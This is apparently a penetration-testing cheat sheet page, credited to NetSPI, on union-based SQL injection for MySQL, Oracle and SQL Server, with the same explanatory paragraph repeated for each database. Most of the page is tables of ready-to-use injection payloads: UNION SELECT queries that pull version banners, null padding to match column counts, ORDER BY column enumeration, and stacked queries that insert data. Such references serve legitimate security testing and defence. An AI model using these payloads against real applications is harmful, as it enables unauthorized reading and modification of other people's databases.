Union-Based Injection
Union based SQL injection allows an attacker to extract information from the database by extending the results returned by the original query. The Union operator can only be used if the original/new queries have the same structure (number and data type of columns). You can try to enumerate the amount of columns using error based enumeration (see error based injection).
| Description | Query |
|---|---|
| Union | SELECT "mysql" UNION SELECT @@version |
| Union subquery | SELECT "mysql" UNION (select @@version) |
| Union null Note: If original query returns more than one column, add null to equal the number of columns |
SELECT "mysql","test" UNION SELECT @@version,null |
| Stacked Queries Note: Stacked queries do not always return results, so they are best used for injections that update/modify data. |
SELECT "mysql"; INSERT INTO 'docs' ('content') VALUES ((SELECT @@version)) |
Union-Based Injection
Union based SQL injection allows an attacker to extract information from the database by extending the results returned by the original query. The Union operator can only be used if the original/new queries have the same structure (number and data type of columns). You can try to enumerate the amount of columns using error based enumeration (see error based injection).
| Description | Query |
|---|---|
| Union | SELECT user FROM dual UNION SELECT * FROM v$version |
| Union subquery | SELECT user FROM dual UNION (SELECT * FROM v$version) |
| Union null Note: If original query returns more than one column, add null to equal the number of columns |
SELECT user,dummy FROM dual UNION (SELECT banner,null FROM v$version) |
Union-Based Injection
Union based SQL injection allows an attacker to extract information from the database by extending the results returned by the original query. The Union operator can only be used if the original/new queries have the same structure (number and data type of columns). You can try to enumerate the amount of columns using error based enumeration (see error based injection).
| Description | Query |
|---|---|
| Union | SELECT user UNION SELECT @@version |
| Union subquery | SELECT user UNION (SELECT @@version) |
| Union null Note: If original query returns more than one column, add null to equal the number of columns |
SELECT user,system_user UNION (SELECT @@version,null) |
| Union null binary halving Note: This query is used to detect the number of columns. Too many columns returns an error, find the [numberOfColumns] that is 1 away from an error |
SELECT * FROM yourtable ORDER BY [numberOfColumns] |
| Stacked query Note: Stacked queries do not always return results, so they are best used for injections that update/modify data. |
SELECT @@version; SELECT @@version -- |
© 2023 Copyright by NetSPI. All rights reserved.